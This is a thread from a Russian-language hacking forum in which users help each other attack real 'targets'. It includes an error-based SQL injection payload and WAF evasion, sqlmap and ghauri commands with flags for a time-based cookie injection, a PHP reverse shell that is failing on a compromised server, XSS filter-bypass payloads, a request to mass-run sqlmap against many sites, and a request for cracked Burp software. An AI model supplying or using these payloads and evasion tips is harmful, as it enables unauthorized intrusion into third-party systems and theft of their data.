• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Привет всем. Возникла сложность с обходом одного фильтра. Вобщем ваф похоже срезает весь пейлоад после знака _
У меня ерорка, я пытаюсь отправить пейлоад вида 10' and extractvalue(1,concat(0x5E,(select count(user) from db.table_name)))-- -
Но имя бд и таблицы имеют этот злоебучий знак и из за него не получается. Плюс они еще в таком месте стоят, после фрома, что их нельзя просто в виде хекса добавить, не будет работать. И я вот что то реально пока не могу догнать как именно это возможно вообще написать запрос без этого знака. Прошу помощи.
 
Привет всем. Возникла сложность с обходом одного фильтра. Вобщем ваф похоже срезает весь пейлоад после знака _
У меня ерорка, я пытаюсь отправить пейлоад вида 10' and extractvalue(1,concat(0x5E,(select count(user) from db.table_name)))-- -
Но имя бд и таблицы имеют этот злоебучий знак и из за него не получается. Плюс они еще в таком месте стоят, после фрома, что их нельзя просто в виде хекса добавить, не будет работать. И я вот что то реально пока не могу догнать как именно это возможно вообще написать запрос без этого знака. Прошу помощи.
было подобное со знаком _ на одном таргете ..тоже тут просил подмогнуть , решения так и не нашли
 
было подобное со знаком _ на одном таргете ..тоже тут просил подмогнуть , решения так и не нашли
Это печально:(
 
Привет, помогите раскрутить:
sqlmap -r ~/leaveonline.txt --random-agent -v 3 --level=3 --risk=3 --tamper=randomcase
Код:
POST {ur;}php HTTP/1.1
Host: {host}
Content-Length: 41
Cache-Control: max-age=0
Accept-Language: ru-RU,ru;q=0.9
Origin: {origin}
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: {random-agent}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: {refer}
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID={phpsessid}
Connection: keep-alive

user=admin&pass=321312321312&button=LOGIN
slqmap определяет базу данных как mssql, но в какой-то момент сервер начинает дропать реквесты. пробовал тамперы для mssql percentage + randomcase - не помогло.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Привет всем.Окунь нашел sql в Сookie ,
Cookie input 8c9509c4c273653a829fb5b4b7b43dbb was set to 25653c929274dd35610e8868ce2c7e6b0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z
Tests performed:
25653c929274dd35610e8868ce2c7e6b0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.293
25653c929274dd35610e8868ce2c7e6b0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.277
25653c929274dd35610e8868ce2c7e6b0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.299
25653c929274dd35610e8868ce2c7e6b0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z =>0.272
Пробовал раскрутить его мапом с разными параметрами ,но никак не выходит,не воспринимает он куки как параметр.Шайтан ГПТ пытался пропихнуть идею о подборе символов (названия таблиц) исходя из задержек ответа,ничего хорошего не вышло.Поиск по форуму ничего не дал.Правильно ли я понимаю что дальше нужно крутить Берпом?Заранее благодарю за ответ.
 
Привет всем.Окунь нашел sql в Сookie ,
Cookie input 8c9509c4c273653a829fb5b4b7b43dbb was set to 25653c929274dd35610e8868ce2c7e6b0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z
Tests performed:
25653c929274dd35610e8868ce2c7e6b0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.293
25653c929274dd35610e8868ce2c7e6b0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.277
25653c929274dd35610e8868ce2c7e6b0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.299
25653c929274dd35610e8868ce2c7e6b0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z =>0.272
Пробовал раскрутить его мапом с разными параметрами ,но никак не выходит,не воспринимает он куки как параметр.Шайтан ГПТ пытался пропихнуть идею о подборе символов (названия таблиц) исходя из задержек ответа,ничего хорошего не вышло.Поиск по форуму ничего не дал.Правильно ли я понимаю что дальше нужно крутить Берпом?Заранее благодарю за ответ.
у мапы нет такого пейлоада и ты не выкрутишь его. Насколько я знаю, как то его там можно добавить, и использовать с какими то тамперами, но проще всего тебе использовать ghauri. --dbms=mysql -tec=t
 
Пожалуйста, обратите внимание, что пользователь заблокирован
у мапы нет такого пейлоада и ты не выкрутишь его. Насколько я знаю, как то его там можно добавить, и использовать с какими то тамперами, но проще всего тебе использовать ghauri. --dbms=mysql -tec=t
ghauri с разными параметрами тоже не смог ее найти,но все равно спасибо)
больше понравился чем мапа
 
ghauri с разными параметрами тоже не смог ее найти,но все равно спасибо)
больше понравился чем мапа
тогда попрбуй в sqlmap добавить флаги --prefix='"' --dbms=mysql --tec=t (просто можешь скопировать, добавить к своим флагам)
 
Привет, не могу стартануть php reverse shell: DAEMONIZE: pcntl_fork() does not exists, moving on... PROC_ERROR: Cannot start the shell.
Passthru: Disabled
Exec: Disabled
System: Disabled
Shell_exec: Disabled
Видимо админ отрубил выполнение кода в пхп. Есть ли способы обойти?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Хотелось бы узнать о простой вещи в хроме:
Действительно ли сейчас в хроме для поиска xss уязвимости нельзя использовать <script>…</script>, если это так, то что вы используете в качестве альтернативы? Возможно вопрос задан коряво, я просто начинаю свой путь, прошу строго не судить.🫠
 
Хотелось бы узнать о простой вещи в хроме:
Действительно ли сейчас в хроме для поиска xss уязвимости нельзя использовать <script>…</script>, если это так, то что вы используете в качестве альтернативы? Возможно вопрос задан коряво, я просто начинаю свой путь, прошу строго не судить.🫠
JavaScript запретили в Хроме? Вот это новость! :) откуда дровишки ?
Скорее всего блочит не Хром такое, а WAF какой-нибудь. Методы обхода (ну сходу навскидку) от <img src="" onerror="alert(1)"/> альтернативы до <scr<script>ipt>...</scri<script>pt> если "выкусыватель бяки" нерекурсивный. Больше можно поискать на hacktricks каком-нибудь, ну или зная особенности жертвы - придумать обход. Метод сокрытия вредоносного пэйлоада в целом называется obfuscation, например "XSS obfuscation" , "SQLi obfuscation", "shellcode obfuscation", etc.
 
подскажите как автоматизировать sqlmap , что бы задать список линков уже с командами , например 10-100 штук сразу, что бы не открывтаь окна на каждую цель, я мею в виду что бы он одновременно раскручивал их. Спасибо
 
подскажите как автоматизировать sqlmap , что бы задать список линков уже с командами , например 10-100 штук сразу, что бы не открывтаь окна на каждую цель, я мею в виду что бы он одновременно раскручивал их. Спасибо
Мне в голову приходит только то, что можно сделать батник, в нем все прописать и запускать.
 
Подскажите, где можно разжиться сканером burp для винды? на гитхабе нашел вариант, но там лоадер генерирует невалидную лицензию, в телеге версия с гитхаба. Заранее спасибо!
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх